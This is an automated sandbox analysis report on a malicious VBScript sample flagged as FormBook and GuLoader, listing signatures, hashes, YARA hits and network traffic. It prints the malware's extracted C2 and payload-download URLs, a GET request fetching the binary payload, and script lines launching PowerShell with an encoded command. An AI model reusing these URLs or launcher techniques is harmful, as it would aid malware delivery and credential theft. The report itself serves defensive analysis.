Windows Analysis Report MTIR22024323_0553381487_20220112120005.vbs

Overview

General Information

Sample Name: MTIR22024323_0553381487_20220112120005.vbs
Analysis ID: 552589
MD5: 564601676bee71f5f61a44ef170d92a6
SHA1: 76fca984dab2358e66524172e04a3528f33d8e18
SHA256: 5e12314df61fd39cad151a41fb0d3188e437c591fa7498f09f103dea4a46f141
Tags: vbs

Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses a Windows Living Off The Land Binaries (LOL bins)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.jewelrystore1.com/wk3t/"], "decoy": ["cherrykidzclub.com", "n104w16417dongesbayrd.info", "pronetheus.com", "tukarbelanjadapatemas.com", "commlike.info", "securityhackersteam.com", "rainbowhitch.com", "nursesgrowhealth.com", "discontinuanceanywhere.com", "comprehensivetitle.site", "astrostorytell.store", "bighorncountymtjail.com", "tetoda.xyz", "derivedflame.online", "staging-api-projectstanley.com", "mcxca.com", "thebluefellowsnft.com", "arizonakissesco.com", "prototypephase.com", "aprillemack.com", "mrrviaa0.com", "reloindiana.com", "osscurrency.com", "orderlaespigabakery.com", "leohillmodeling.com", "ybferro.com", "laorganicwarehouse.com", "coastalrey.com", "gavno.online", "ienqqv.xyz", "ttautoglass.com", "jeffreywlewiscarpentry.com", "aromav60.online", "d4vlkjrx.xyz", "agooddomain.com", "pse516.info", "trustexpressfreight.com", "tropiksuncc.com", "greenrailfinancialgroup.com", "caoyuzhou.tech", "calibergaragedoorrepairsinc.com", "medxcuz.online", "vqjktrqkgikswr.top", "danaesoftware.com", "onlinemagazineshop.online", "exxxclusivenft.com", "whatweather.today", "smbyee.com", "bjitwb.com", "mellowsgummies.com", "romeovillepowerwashing.com", "cheapest-swimmingpool.com", "bagspabandung.com", "conservational.one", "watertalk-kickstarter.com", "japanesefood-osaka.com", "aml-corp.com", "insurancemetafi.com", "bjxsjkj.com", "teerspmr.com", "fmkj888.group", "lawoe.net", "promotourpackages.com", "danielsden.store"]}
Source: 00000012.00000000.495265082.0000000002D00000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://www.wizumiya.co.jp/html/user_da"}
Multi AV Scanner detection for submitted file
Source: MTIR22024323_0553381487_20220112120005.vbs ReversingLabs: Detection: 12%
Yara detected FormBook
Source: Yara match File source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY
Source: unknown HTTPS traffic detected: 52.68.15.223:443 -> 192.168.2.6:49775 version: TLS 1.2
Source: Binary string: cmstp.pdbGCTL source: ieinstal.exe, 00000012.00000002.602875581.00000000030F0000.00000040.00020000.sdmp
Source: Binary string: ieinstal.pdbGCTL source: cmstp.exe, 0000001B.00000002.891641953.0000000004CDF000.00000004.00020000.sdmp, explorer.exe, 00000022.00000000.720341637.0000000006F9F000.00000004.00020000.sdmp
Source: Binary string: ieinstal.pdb source: cmstp.exe, 0000001B.00000002.891641953.0000000004CDF000.00000004.00020000.sdmp, explorer.exe, 00000022.00000000.720341637.0000000006F9F000.00000004.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp, ieinstal.exe, 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp, ieinstal.exe, 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, cmstp.exe, cmstp.exe, 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp
Source: Binary string: cmstp.pdb source: ieinstal.exe, 00000012.00000002.602875581.00000000030F0000.00000040.00020000.sdmp

Networking:

Potential malicious VBS script found (has network functionality)
Source: Initial file: BinaryStream.SaveToFile Landsk, adSaveCreateOverWrite
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.jewelrystore1.com/wk3t/
Source: Malware configuration extractor URLs: https://www.wizumiya.co.jp/html/user_da
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /html/user_data/original/images/bin_WUOAiR166.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: www.wizumiya.co.jp Cache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: explorer.exe, 00000022.00000000.712071572.00000000049DC000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.719054481.00000000049DC000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.562105114.00000000074DC000.00000004.00000001.sdmp String found in binary or memory: http://crl.microsoft
Source: ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmp String found in binary or memory: http://fahrschule-heli.at/bin_WUOAiR166.bin
Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000022.00000003.708741474.0000000004BF0000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.711582257.0000000004BF0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.microsoft.
Source: powershell.exe, 00000004.00000002.553266966.0000000004631000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000016.00000000.550056536.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.525388426.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.574580825.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: cmstp.exe, 0000001B.00000002.879127665.00000000003F8000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmp String found in binary or memory: https://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.bin
Source: ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmp String found in binary or memory: https://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.binhttp://fahrschule-heli.at
Source: unknown DNS traffic detected: queries for: www.wizumiya.co.jp
Source: global traffic HTTP traffic detected: GET /html/user_data/original/images/bin_WUOAiR166.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: www.wizumiya.co.jp Cache-Control: no-cache
Source: unknown HTTPS traffic detected: 52.68.15.223:443 -> 192.168.2.6:49775 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\cmstp.exe Dropped file: C:\Users\user\AppData\Roaming\O118090C\O11logri.ini
Source: C:\Windows\SysWOW64\cmstp.exe Dropped file: C:\Users\user\AppData\Roaming\O118090C\O11logrv.ini
Malicious sample detected (through community Yara rule)
Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
Potential malicious VBS script found (suspicious strings)
Source: Initial file: obj1.ShellExecute MyFile , " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
Source: Initial file: obj1.ShellExecute "powershell.exe", " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7149
Uses a Windows Living Off The Land Binaries (LOL bins)
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Yara signature match
Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00D1CDF8 4_2_00D1CDF8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00D1DED8 4_2_00D1DED8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07617E00 4_2_07617E00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07617E00 4_2_07617E00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD2EF7 18_2_1EDD2EF7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDCD616 18_2_1EDCD616
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED26E30 18_2_1ED26E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD1FF1 18_2_1EDD1FF1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDCD466 18_2_1EDCD466
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED1841F 18_2_1ED1841F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD25DD 18_2_1EDD25DD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED1D5E0 18_2_1ED1D5E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED32581 18_2_1ED32581
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD1D55 18_2_1EDD1D55
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD2D07 18_2_1EDD2D07
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED00D20 18_2_1ED00D20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD22AE 18_2_1EDD22AE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDCDBD2 18_2_1EDCDBD2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3EBB0 18_2_1ED3EBB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD2B28 18_2_1EDD2B28
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD28EC 18_2_1EDD28EC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED1B090 18_2_1ED1B090
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED320A0 18_2_1ED320A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD20A8 18_2_1EDD20A8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDC1002 18_2_1EDC1002
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0F900 18_2_1ED0F900
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED24120 18_2_1ED24120
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E841F 27_2_047E841F
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0489D466 27_2_0489D466
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04802581 27_2_04802581
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A25DD 27_2_048A25DD
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D0D20 27_2_047D0D20
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A2D07 27_2_048A2D07
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047ED5E0 27_2_047ED5E0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A1D55 27_2_048A1D55
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047F6E30 27_2_047F6E30
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A2EF7 27_2_048A2EF7
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0489D616 27_2_0489D616
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048ADFCE 27_2_048ADFCE
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A1FF1 27_2_048A1FF1
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048020A0 27_2_048020A0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A20A8 27_2_048A20A8
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FA830 27_2_047FA830
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A28EC 27_2_048A28EC
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04891002 27_2_04891002
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048AE824 27_2_048AE824
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047EB090 27_2_047EB090
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047F4120 27_2_047F4120
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047DF900 27_2_047DF900
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A22AE 27_2_048A22AE
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0488FA2B 27_2_0488FA2B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480EBB0 27_2_0480EBB0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FAB40 27_2_047FAB40
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048903DA 27_2_048903DA
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0489DBD2 27_2_0489DBD2
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A2B28 27_2_048A2B28
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_00632D8F 27_2_00632D8F
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_00632D90 27_2_00632D90
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_00639E60 27_2_00639E60
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064DE6D 27_2_0064DE6D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_00639E5C 27_2_00639E5C
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064D70F 27_2_0064D70F
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_00632FB0 27_2_00632FB0
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 1ED0B150 appears 35 times
Source: C:\Windows\SysWOW64\cmstp.exe Code function: String function: 047DB150 appears 54 times
Contains functionality to call native functions
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED496E0 NtFreeVirtualMemory,LdrInitializeThunk, 18_2_1ED496E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49660 NtAllocateVirtualMemory,LdrInitializeThunk, 18_2_1ED49660
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49780 NtMapViewOfSection,LdrInitializeThunk, 18_2_1ED49780
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED497A0 NtUnmapViewOfSection,LdrInitializeThunk, 18_2_1ED497A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49710 NtQueryInformationToken,LdrInitializeThunk, 18_2_1ED49710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49540 NtReadFile,LdrInitializeThunk, 18_2_1ED49540
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49A50 NtCreateFile,LdrInitializeThunk, 18_2_1ED49A50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49A00 NtProtectVirtualMemory,LdrInitializeThunk, 18_2_1ED49A00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49A20 NtResumeThread,LdrInitializeThunk, 18_2_1ED49A20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED498F0 NtReadVirtualMemory,LdrInitializeThunk, 18_2_1ED498F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49840 NtDelayExecution,LdrInitializeThunk, 18_2_1ED49840
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49860 NtQuerySystemInformation,LdrInitializeThunk, 18_2_1ED49860
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED499A0 NtCreateSection,LdrInitializeThunk, 18_2_1ED499A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49910 NtAdjustPrivilegesToken,LdrInitializeThunk, 18_2_1ED49910
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED496D0 NtCreateKey, 18_2_1ED496D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49650 NtQueryValueKey, 18_2_1ED49650
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49670 NtQueryInformationProcess, 18_2_1ED49670
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49610 NtEnumerateValueKey, 18_2_1ED49610
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49FE0 NtCreateMutant, 18_2_1ED49FE0
